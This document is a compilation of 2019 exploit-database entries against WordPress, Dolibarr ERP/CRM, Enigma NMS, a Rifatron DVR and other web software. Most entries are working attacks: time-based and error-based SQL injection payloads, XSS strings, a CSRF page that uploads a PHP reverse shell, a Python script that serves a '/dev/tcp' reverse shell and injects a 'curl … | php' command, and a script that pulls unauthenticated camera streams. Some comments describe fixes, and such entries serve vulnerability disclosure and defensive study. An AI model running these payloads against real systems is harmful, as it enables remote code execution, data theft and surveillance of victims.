-
WordPress Core 5.2.3 - Cross-Site Host Modification
#!/usr/bin/perl -w
#
# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Type: Remote
# Risk: High
#
# Solution:
# Set security headers on the web server and no-cache for Cache-Control
#
# Simple Attack Scenarios:
#
# o This attack can bypass a simple WAF to access restricted content on the web server,
#   something like phpMyAdmin;
#
# o This attack can deface the vulnerable Wordpress website with content from the default vhost;
#
# Disclaimer:
# This or previous programs are for educational purposes ONLY. Do not use them without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (data loss,
# system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#
# ====================================================================================
#
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#
# Sample session ('>' = request header sent, '<' = response header received).
# The Location header echoes the value supplied in the request's Host header,
# and X-Redirect-By shows WordPress built that redirect.
#
# > Host => default-vhost.com
# > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# > Content-Type => application/x-www-form-urlencoded
#
# < Connection => close
# < Date => Fri, 06 Sep 2019 11:39:43 GMT
# < Location => https://default-vhost.com/
# < Server => nginx
# < Content-Type => text/html; charset=UTF-8
# < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
# < Client-Peer => 13.37.13.37:443
# < Client-Response-Num => 1
# < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
# < Client-SSL-Cert-Subject => /CN=default-vhost.com
# < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
# < Client-SSL-Socket-Class => IO::Socket::SSL
# < Client-SSL-Warning => Peer certificate not verified
# < Client-Transfer-Encoding => chunked
# < Strict-Transport-Security => max-age=31536000;
# < X-Powered-By => PHP/7.3.9
# < X-Redirect-By => WordPress
#
# ====================================================================================
#
use strict;
use v5.10;                    # provides 'say'
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;   # rand_ua(); CPAN module, not core

# Positional arguments: target base URL, then the value to send as the Host
# header (defaults to the placeholder 'default-vhost.com').
my $host = shift || '';
my $attacker = shift || 'default-vhost.com';
say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # ==================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
# Anything not starting with "http" is treated as a missing target: print
# usage and stop. (The usage string deliberately contains a line break.)
if ($host !~ m/^http/){
    say "# e.g. 
perl $0 https://target:port/ default-vhost.com";
    exit;
}
my $user_agent = rand_ua("browsers");
# verify_hostname => 0 turns off TLS certificate validation, which is why the
# sample session above reports "Peer certificate not verified". Fine for a
# one-shot header check; it should not be copied into anything that handles
# real data.
my $browser = LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } );
$browser->timeout(10);
$browser->agent($user_agent);
# One POST with a single-space body; the Host header is then replaced with
# the caller-supplied name. That override is the entire test: a correctly
# configured server answers only for names it serves and never builds
# redirects from an unvalidated Host (see the Solution note in the header).
my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
# Bail out on 401; the numeric status is compared as a string here.
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
# Dump every request header ('>') and every response header ('<'). A Location
# that repeats the supplied Host value, as in the sample session, is the
# indicator to look for.
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
say "# ====================================================================================";
-
Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection
# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== elemid (POST) - Sql injection PoC POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php Content-Type: application/x-www-form-urlencoded Content-Length: 143 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi] Parameter: elemid (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT (ELT(7549=7549,1))),0x7176787a71)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)
-
Enigma NMS 65.0.0 - Cross-Site Request Forgery
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
# Date: 21 July 2019                                                 #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage: https://www.netsas.com.au/                        #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16068                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
_ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma CSRF by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus
The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
<html>
<!-- Rewrites the address bar to "/" so the page looks like an ordinary
     document while the forged request is being sent. -->
<script>history.pushState('', '', '/')</script>
<script>
// Forges a multipart upload to manage_files.cgi using the victim's own
// session (withCredentials = true). Nothing in the request is unpredictable:
// no anti-CSRF token, no custom header the browser would refuse to send.
// That is the weakness being shown; server-side fixes are a per-session
// token checked on every state-changing request, an Origin/Referer check,
// and SameSite cookies. Restricting the upload endpoint to a file allow-list
// would also stop a .php file from landing in a web-served directory.
function submitRequest() {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    // The boundary here must match the one used in the body below.
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
    xhr.withCredentials = true;
    // Hand-built multipart body: action=system_upgrade,
    // action_aux=upload_file_complete, the uploaded file (upfile) and its
    // name (upfile_name). The file content is the PHP reverse shell named in
    // the description; <attacking_host_ipaddr> is a placeholder.
    var body = "-----------------------------208051173310446317141640314495\r\n" +
        "Content-Disposition: form-data; name=\"action\"\r\n" +
        "\r\n" +
        "system_upgrade\r\n" +
        "-----------------------------208051173310446317141640314495\r\n" +
        "Content-Disposition: form-data; name=\"action_aux\"\r\n" +
        "\r\n" +
        "upload_file_complete\r\n" +
        "-----------------------------208051173310446317141640314495\r\n" +
        "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" +
        "Content-Type: application/x-php\r\n" +
        "\r\n" +
        "\x3c?php\n" +
        "\n" +
        "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" +
        "\n" +
        "?\x3e\n" +
        "\r\n" +
        "-----------------------------208051173310446317141640314495\r\n" +
        "Content-Disposition: form-data; name=\"upfile_name\"\r\n" +
        "\r\n" +
        "evil.php\r\n" +
        "-----------------------------208051173310446317141640314495--\r\n";
    // Copy the string into a byte array so the Blob is sent without any
    // re-encoding of the body.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
// Fired once here and again from the body onload handler below, so the
// request may be sent twice.
submitRequest();
// Navigate away immediately so the victim lands on a normal NMS page.
window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
</script>
<body onload="submitRequest();" >
</body>
</html>
-
Enigma NMS 65.0.0 - OS Command Injection
#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection                     #
# NETSAS Pty Ltd Enigma NMS                                          #
# Date: 21 July 2019                                                 #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage: https://www.netsas.com.au/                        #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16072                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
# Python 2 script (print statements, raw_input, SimpleHTTPServer).
# Flow: prompt for targets and credentials, write a PHP reverse shell to
# the current directory, serve it over HTTP, start a netcat listener, then
# send one authenticated GET whose ip_address parameter is a shell pipeline.
import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading

os.system('clear')
print("""\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus """)

# Interactive parameters; none are validated before being spliced into the
# URL and the PHP file below.
enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
user = raw_input("Enter Username:\t\t\t")
# Terminal echo is switched off around the password prompt via stty; if the
# script dies in between, echo stays off for that terminal.
os.system("stty -echo")
password = raw_input("Enter Password (no echo):\t")
os.system("stty echo")

# The ip_address query parameter carries a shell pipeline ("|curl ...|php")
# rather than an address, which the vulnerable CGI evidently hands to a shell
# unescaped (CVE-2019-16072 per the header). The defensive fix is to validate
# ip_address against an address syntax and to invoke tools with an argument
# list instead of a shell string.
enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
# Browser-like headers; note the Referer is built from attack_host, not the
# NMS host.
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "\n\n[+] Building PHP reverse shell"
# Writes evil.php into the working directory; it is never deleted by the
# cleanup step at the end.
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file
print "[+] Hosting PHP reverse shell"
# raw_input already returns a str, so this conversion is a no-op.
web_svr_port = str(web_svr_port)
# Own process group (os.setsid) so the whole server can be killed with killpg.
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener
print "[+] Creating listener on port " + rev_sh_port
# The listener handle is discarded: it is neither waited for nor terminated.
subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS
print "[+] Sending payload\n"
# NOTE(review): the bare except swallows every error (including auth
# failures and timeouts), and the response r is never inspected, so there is
# no feedback on whether the request was accepted.
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
except:
    pass

print "\n[+] Cleaning up mess..."
# Shut down http server
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)
-
Enigma NMS 65.0.0 - SQL Injection
#--------------------------------------------------------------------# # Exploit Title: Enigma NMS search_pattern SQL Injection # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16065 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma SQLi by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern= Vulnerable Parameter: search_pattern (GET) Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
-
Online Appointment - SQL Injection
# Exploit Title: Online Appointment SQL Injection
# Date: 07.09.2019
# Exploit Author: mohammad zaheri
# Vendor Homepage: https://github.com/girish03/Online-Appointment-Booking-System
# Tested on: Windows
# Google Dork: N/A

=========
Vulnerable Page:
=========
Online-Appointment-Booking-System-master/signup.php

==========
Vulnerable Source:
==========
Line 52: $name=$_POST['fname'];
Line 53: $gender=$_POST['gender'];
Line 54: $dob=$_POST['dob'];
Line 55: $contact=$_POST['contact'];
Line 56: $email=$_POST['email'];
Line 57: $username=$_POST['username'];
Line 58: $password=$_POST['pwd'];
Line 59: $prepeat=$_POST['pwdr'];
Line 62: if (mysqli_query($conn, $sql))

=========
POC:
=========
http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL]

=========
Contact Me :
=========
Telegram : @m_zhrii
Email : [email protected]
-
Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure
#!/bin/bash
#
#
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
#
#
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
# Product web page: http://www.rifatron.com
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
#                   7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
# Firmware: <=8.0 (000143)
#
#
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
# servicing the security market as a leading CCTV/video surveillance security
# system manufacturer, specializing in stand-alone digital video recorders since
# 1998. We are known for making the first standalone DVR with audio detection
# and 480 frames per second (fps) and have been focusing on high-end products and
# large projects in a variety of applications and markets. These include government
# and public services, banking and finance, hotels and entertainment, retail,
# education, industrial and commercial sectors throughout Europe, the Middle East,
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
# Rifatron is trying its utmost in technology development and customer
# satisfaction to be the best security solution company in the world.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when the animate.cgi script is called through the Mobile Web Viewer module.
#
# Tested on: Embedded Linux
#            Boa/0.94.14rc21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2019-5532
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
#
#
# 03.09.2019
#
#{PoC}
#
# Fetches ten frames from animate.cgi without any credentials, stitches them
# into a short clip and plays it. The endpoint answering at all without a
# session is the finding; the mitigation is to require authentication on the
# Mobile Web Viewer endpoints or to disable the module.
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
    echo "Ex.: $0 10.9.8.7:65432 10"
    exit
fi
# Neither argument is validated; CHANNEL is interpolated straight into the URL.
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
# Fingerprint: a 404 for the mobile viewer login page is taken to mean the
# module is absent. Only "404" is treated as not vulnerable; any other status
# falls through to the capture loop.
# NOTE(review): with -e and pipefail a curl failure in this substitution
# aborts the script with no message; confirm that is the intended behaviour.
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$STATUS" == "404" ]; then
    echo "Target not vulnerable!"
    exit
fi
echo "Collecting snapshots..."
# Ten sequential JPEG grabs, ~0.6 s apart, saved as sequence-1.jpg ... sequence-10.jpg.
for x in {1..10}; do
    echo -ne $x
    curl "$HOST" -o sequence-$x.jpg -#; sleep 0.6
done
echo -ne "\nDone."
echo -ne "\nRendering video..."
# One input frame per second, output at 10 fps, 352x288, no audio.
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
# Plays fullscreen and quits when the clip ends.
cvlc video.mp4 --verbose -1 -f vlc://quit
#
#{/PoC}
-
WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting
# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: [email protected]
# Discovery Date: September 09,2019
# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads
# Software Link : https://wordpress.org/plugins/sell-downloads/
# Tested Version: 1.0.86
# Tested on: Parrot OS, Wordpress 5.1.1

# PoC:
1- Go to the "Products for Sale" section
2- Click on "Add New"
3- In the opened window click on "Add Comment"
4- Fill the comment with "/><img src=x onerror="alert()"> or "/><input type="text" onclick="alert()">
5- Click on "Publish" (or "Update" if you are editing an existing product)
6- You will see a pop-up (also if you click on the input); the pop-up also appears when you open the product link.
-
Dolibarr ERP-CRM 10.0.1 - SQL Injection
# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== actioncode (POST) - Sql injection PoC http request: POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774 Content-Type: application/x-www-form-urlencoded Content-Length: 610 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save Parameter: actioncode (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE 0x28 END))-- 
HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT (ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)-- jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save . . . . . 
demand_reason_id, availability_id (POST) - Sql injection PoC http request: POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals Content-Type: application/x-www-form-urlencoded Content-Length: 471 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty Parameter: demand_reason_id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28 END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: 
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT (ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty . . Parameter: availability_id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28 END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT (ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY 
x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 AND (SELECT 9904 FROM (SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
-
WordPress Plugin Photo Gallery 1.5.34 - SQL Injection
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection # inurl:"\wp-content\plugins\photo-gallery" # Date: 09-10-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: https://10web.io/ # Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip # Version: Up to v1.5.34 # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap # CVE : 2019-16119 # Software description: Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. # Technical Details & Impact: Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from them. # POC In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection. Following is the POC, 1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc& 2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc& # Timeline 09-01-2019 - 